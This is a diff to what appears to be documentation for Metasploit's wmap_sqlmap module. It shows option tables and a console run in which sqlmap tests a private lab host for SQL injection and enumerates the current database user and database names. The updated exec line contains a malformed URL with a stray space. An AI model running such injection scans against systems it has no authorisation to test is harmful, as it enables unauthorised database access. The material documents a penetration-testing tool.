@@ -32,43 +32,42 @@ msf auxiliary(wmap_sqlmap) > show options
3232
3333Module options:
3434
35- Name Current Setting Required Description
36- ---- --------------- -------- -----------
37- BATCH true yes Never ask for user input, use the default behaviour
38- DATA no The data string to be sent through POST
39- METHOD GET yes HTTP Method
40- OPTS --dbs --current-user no The sqlmap options to use
41- PATH /sqlmap/mysql/get_int.php yes The path/file to test for SQL injection
42- Proxies no Use a proxy chain
43- QUERY id=1 no HTTP GET query
44- RHOSTS 192.168.1.121 yes The target address range or CIDR identifier
45- RPORT 80 yes The target port
46- SQLMAP_PATH /home/inquis/software/sqlmap/trunk/sqlmap/sqlmap.py yes The sqlmap >= 0.6.1 full path
47- SSL false no Use SSL
48- THREADS 1 yes The number of concurrent threads
49- VHOST no HTTP server virtual host
35+ Name Current Setting Required Description
36+ ---- --------------- -------- -----------
37+ BATCH true yes Never ask for user input, use the default behaviour
38+ BODY no The data string to be sent through POST
39+ METHOD GET yes HTTP Method
40+ OPTS --dbs --current-user no The sqlmap options to use
41+ PATH /sqlmap/mysql/get_int.php yes The path/file to test for SQL injection
42+ Proxies no Use a proxy chain
43+ QUERY id=1 no HTTP GET query
44+ RHOSTS 192.168.1.121 yes The target address range or CIDR identifier
45+ RPORT 80 yes The target port
46+ SQLMAP_PATH /home/inquis/software/sqlmap/trunk/sqlmap/sqlmap.py yes The sqlmap >= 0.6.1 full path
47+ SSL false no Use SSL
48+ THREADS 1 yes The number of concurrent threads
49+ VHOST no HTTP server virtual host
5050
5151msf auxiliary(wmap_sqlmap) > run
52- [*] exec: /home/inquis/software/sqlmap/trunk/sqlmap/sqlmap.py -u 'http://192.168.1.121/sqlmap/mysql/get_int.php?id=1' --method GET --dbs --current-user --batch
52+ [*] exec: /home/inquis/software/sqlmap/trunk/sqlmap/sqlmap.py -u 'http://192.168.1.121:80/ /sqlmap/mysql/get_int.php?id=1' --method GET --dbs --current-user --batch
5353SQLMAP:
5454SQLMAP: sqlmap/0.6.1 coded by Bernardo Damele A. G. <
[email protected] >
5555SQLMAP: and Daniele Bellucci <
[email protected] >
5656SQLMAP:
57- SQLMAP: [*] starting at: 01:31:41
57+ SQLMAP: [*] starting at: 16:23:19
5858SQLMAP:
59- SQLMAP: [01:31:42 ] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
59+ SQLMAP: [16:23:20 ] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
6060SQLMAP: back-end DBMS: MySQL >= 5.0.0
6161SQLMAP:
6262SQLMAP: current user: 'testuser@localhost'
6363SQLMAP:
64- SQLMAP: available databases [4 ]:
64+ SQLMAP: available databases [3 ]:
6565SQLMAP: [*] information_schema
6666SQLMAP: [*] mysql
67- SQLMAP: [*] privatedb
6867SQLMAP: [*] test
6968SQLMAP:
7069SQLMAP:
71- SQLMAP: [*] shutting down at: 01:31:44
70+ SQLMAP: [*] shutting down at: 16:23:21
7271SQLMAP:
7372[*] Auxiliary module execution completed
7473msf auxiliary(wmap_sqlmap) >
0 commit comments